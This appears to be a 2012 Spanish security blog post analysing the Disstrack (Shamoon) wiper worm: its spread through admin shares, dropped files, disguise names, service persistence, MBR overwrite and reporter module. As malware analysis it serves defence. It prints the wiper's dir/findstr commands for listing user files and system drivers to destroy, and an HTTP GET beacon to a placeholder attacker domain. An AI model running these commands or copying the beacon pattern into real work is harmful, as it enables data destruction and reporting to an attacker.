Buscar este blog

lunes, 27 de agosto de 2012

Virus capaz de destruir la MBR, documentos, fotos y vídeos: Disstrack

Disstrack

Actualidad Virus

Buscar virus

Gusano para plataformas Windows que se propaga a través de unidades de red compartidas, extrae del propio ejecutable e instala nuevos modulos que sobreescriben ficheros del equipo, dejándolo inservible y modifican el registro de maestro de arranque e manera que el equipo no pueda volver a arrancar

Detalles técnicos
  • Difusión: Baja
  • Daño: Bajo
  • Dispersibilidad: Baja
  • Fecha de alta: 20/08/2012
  • Última actualización: 23/08/2012

Propagación

Capacidad de autopropagación: No

Carece de rutina propia de propagación. Puede llegar al sistema de las siguientes maneras:

Unidades del Sistema
Unidades del sistema (locales, mapeadas, extraíbles)
Unidades Locales del Sistema
Se propaga a unidades locales del sistema.
Otro mecanismo de propagación
  • Descargado por otro código malicioso o descargado sin el conocimiento del usuario al visitar una página Web infectada.
  • Descargarlo de algún programa de compartición de ficheros (P2P).

 

Infección/Efectos

Cuando Disstrack se ejecuta, realiza las siguientes acciones:

Ficheros y carpetas
  1. Crea los siguientes ficheros
    • "%System%\trksrv.exe"
    • "%System%\drivers\drdisk.sys"
    • "%System%\netinit.exe"
    • "%System%\[Nombre-Seleccionado-de-una-lista].exe"
Resto de acciones
    Método de infección

    El gusano llega al equipo comprometido a través de unidades de red compartidas:

    • \\[EQUIPO]\ADMIN$
    • \\[EQUIPO]\C$\\WINDOWS
    • \\[EQUIPO]\D$\\WINDOWS
    • \\[EQUIPO]\E$\\WINDOWS

    El fichero original es un ejecutable de 32 bits de nombre TRKSVR.EXE de 989184 bytes de tamaño. Cuando se ejecuta se instala como un servicio del sistema. Este servicio extrae del propio fichero ejecutable, e instala, otros componentes/módulos. Estos componentes estan almacenados en ejecutable original como recursos con nombres PKCS12, PKCS7 y X509.

    Otros detalles

    Cuando el gusano es ejecutado, se copia a sí mismo en las siguientes unidades de red compartidas:

    • \\[EQUIPO]\ADMIN$
    • \\[EQUIPO]\C$\\WINDOWS
    • \\[EQUIPO]\D$\\WINDOWS
    • \\[EQUIPO]\E$\\WINDOWS

    El gusano consta de varios componentes:

    • Un Dropper: Componente principal que descarga otros módulos y es el primero que infecta el sistema.
    • El "Wiper": Se trata del módulo que contiene la funcionalidad destructiva.
    • El informador (Reporter): Se trata del módulo que envía información de la infección al atacante.

    El Dropper tiene las siguientes funcionalidades:

    • Se copia a sí mismo en %System%\trksrv.exe
    • Descarga los siguientes módulos:
      • Un Dropper de 64 bits: Se encuentra en el fichero %System%\trksrv.exe en el recurso cifrado “X509”
      • El módulo informador: Se encuentra en el fichero %System%\netinit.exe en el recurso cifrado "PKCS7"
      • El módulo "Wiper" (Limpiador): Se encuentra en %System%\[Nombre-Seleccionado-de-una-lista].exe en el recurso cifrado "PKCS12"

      Nota: [Nombre-Seleccionado-de-una-lista] puede ser uno de los siguientes:

      • caclsrv
      • certutl
      • clean
      • ctrl
      • dfrag
      • dnslookup
      • dvdquery
      • event
      • extract
      • findfile
      • fsutl
      • gpget
      • iissrv
      • ipsecure
      • msinit
      • ntx
      • ntdsutl
      • ntfrsutil
      • ntnw
      • power
      • rdsadmin
      • regsys
      • routeman
      • rrasrv
      • sacses
      • sfmsc
      • sigver
      • smbinit
      • wcscript
    • Se copia a sí mismo en las siguientes unidades de red compartidas:
      • \\[EQUIPO]\ADMIN$
      • \\[EQUIPO]\C$\\WINDOWS
      • \\[EQUIPO]\D$\\WINDOWS
      • \\[EQUIPO]\E$\\WINDOWS
    • Crea una tarea programada para ejecutarse a sí mismo
    • Crea el siguiente servicio para ejecutarse cada vez que se inicia Windows:
      Servicio: TrkSvr
      Nombre: Distributed Link Tracking Server
      Ruta: %System%\trksvr.exe

    El módulo "Wiper" (Limpiador) realiza las siguientes tareas:


    • Borra el siguinte fichero de drivers y crea un fichero legítimo con el mismo nombre, pero que el troyano utiliza para leer y escribir directamente sectores en disco sin pasar por el sistema operativo:

      • %System%\drivers\drdisk.sys

      Este driver es usado para sobreescribir el MBR (Master Boot Record) del ordenador pero no es malicioso en sí mismo.

      El fichero esta firmado digitalmente por “EldoS Corporation".


    • Ejecuta los siguientes comandos para recabar nombres de ficheros , los cuales serán sobreescritos como f1.inf y f2.inf:
              dir "C:\Documents and Settings\" /s /b /a:-D 2>nul | findstr -i download 2>nul >f1.inf 

      dir "C:\Documents and Settings\" /s /b /a:-D 2>nul | findstr -i document 2>nul >>f1.inf

      dir C:\Users\ /s /b /a:-D 2>nul | findstr -i download 2>nul >>f1.inf

      dir C:\Users\ /s /b /a:-D 2>nul | findstr -i document 2>nul >>f1.inf

      dir C:\Users\ /s /b /a:-D 2>nul | findstr -i picture 2>nul >>f1.inf

      dir C:\Users\ /s /b /a:-D 2>nul | findstr -i video 2>nul >>f1.inf

      dir C:\Users\ /s /b /a:-D 2>nul | findstr -i music 2>nul >>f1.inf

      dir "C:\Documents and Settings\" /s /b /a:-D 2>nul | findstr -i desktop 2>nul >f2.inf

      dir C:\Users\ /s /b /a:-D 2>nul | findstr -i desktop 2>nul >>f2.inf

      dir C:\Windows\System32\Drivers /s /b /a:-D 2>nul >>f2.inf

      dir C:\Windows\System32\Config /s /b /a:-D 2>nul | findstr -v -i systemprofile 2>nul >>f2.inf


      Nota: Los ficheros de f1.inf y f2.inf serán sobreescritos con una imagen JPEG que trae incorporada el modulo Wiper y que se puede ver más abajo. Los ficheros sobreescritos quedan inutiles y no puede ser reparados. Tienen que ser sustituidos por los ficheros originales.

      Nota: Estos comandos, entre otros sobreescriben:


      • Todos los fichero descargados por el usuario y que se encuentren en la carpeta "Descargas"
      • Todos los documentos del usuario que se encuentren en la carpeta "Mis Documentos"
      • Todas las imágenes del usuario que se encuentre en la carpeta "Mis imágenes"
      • Todos los videos del usuario que se encuentren en la carpeta "Vídeos"
      • Toda la música del usuario que se encuentre en la carpeta "Música"
      • Todos los ficheros que se encuentre en el escritorio
      • Todos los drivers del sistema alojados en C:\Windows\System32\Drivers
      • Todos los ficheros de configuración del sistema alojados en C:\Windows\System32\Config

    • El módulo sobreescribe el MBR y de esta manera el equipo comprometido no vuelve a arrancar.

    La siguiente cadena fue encontrada en el código fuente del módulo "Wiper" y da una idea de a quien va dirigido este gusano:

    C:\Shamoon\ArabianGulf\wiper\release\wiper.pdb

    Por último el módulo informador es responsable de enviar información sobre la infección al atacante.

    La Información es enviada usando una petición HTTP GET con la siguiente esctructura:

    http://[DOMINIO]/ajax_modal/modal/data.asp?mydata=[DATOS]&uid=[UID]&state=[ESTADO]

    La siguiente información es, de esta forma, mandada al atacante:


    • [MYDATA] = Indica cuantos ficheros fueron sobre escritos
    • [UID] = Dirección IP del equipo comprometido
    • [STATE] = Número aleatorio